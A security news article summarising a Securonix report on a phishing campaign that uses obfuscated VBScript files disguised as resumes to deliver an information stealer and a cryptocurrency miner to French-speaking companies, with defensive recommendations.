A sophisticated phishing campaign is targeting French-speaking corporate environments with fake job resumes, leading to the theft of enterprise credentials and the deployment of cryptocurrency mining malware. Security researchers from Securonix detailed the ongoing attack, which utilizes highly obfuscated VBScript files disguised as curriculum vitae documents.
Attack Methodology and Initial Infection
The campaign begins with phishing emails that deliver malicious attachments. These files are presented as resumes or CVs, a tactic designed to exploit the high volume of document exchanges common in corporate hiring processes. According to researchers Shikha Sangwan, Akshay Gaikwad, and Aaron Beardslee, the attached files are actually VBScript scripts that have been heavily obfuscated to evade detection by security software.
When an employee opens the file, the script executes. Its primary function is to download and run additional payloads from attacker-controlled servers. This multi-stage approach allows the attackers to deploy different types of malware based on their objectives and the compromised system’s environment.
Malware Payloads and Objectives
The final payloads of this campaign serve a dual purpose: information theft and resource hijacking. One of the key malware families deployed is an information stealer designed to harvest sensitive credentials from the infected machine. This includes saved browser passwords, session cookies, and other authentication data that could provide access to corporate networks and cloud services.
Simultaneously, the attackers deploy a cryptocurrency miner, often called a crypto miner. This software secretly uses the computational power of the infected corporate computers to generate digital currency like Monero for the attackers’ profit. This activity can lead to significantly slowed computer performance, increased electricity costs, and hardware wear and tear for the victim organization.
Geographic and Linguistic Targeting
The campaign’s focus on French-speaking corporate environments indicates a deliberate targeting strategy. The phishing emails and decoy documents are likely crafted in French to appear more legitimate and increase the likelihood of successful infection within companies in France, Belgium, Canada, Switzerland, and other Francophone regions. This geographical specificity helps the attackers bypass generic, language-based spam filters.
Security Implications for Organizations
This campaign highlights a persistent threat to corporate security: social engineering attacks that mimic routine business communications. The use of fake resumes exploits a fundamental and trusted business process, making it difficult for employees to remain vigilant. The combination of credential theft and crypto-mining also demonstrates the multifaceted financial motives of modern cybercriminals, who seek both immediate monetary gain through mining and long-term access for further attacks.
Security teams are advised to treat unsolicited resumes with heightened suspicion, especially those arriving via email from unknown senders. Technical defenses should include robust email filtering, application whitelisting to prevent the execution of scripts like VBScript from untrusted locations, and endpoint detection systems capable of identifying the behavioral patterns of information stealers and crypto miners.
Ongoing Investigation and Future Outlook
Securonix researchers continue to monitor the campaign. The infrastructure used to host the malicious payloads may be taken down or altered as the investigation progresses. Organizations in the targeted regions should anticipate similar attacks leveraging localized social engineering lures. The expected next steps involve deeper analysis of the malware’s command and control servers to potentially identify the threat actors and disrupt their operations. Security vendors will likely update their detection signatures to catch the obfuscated VBScript files and associated payloads.
Source: Securonix
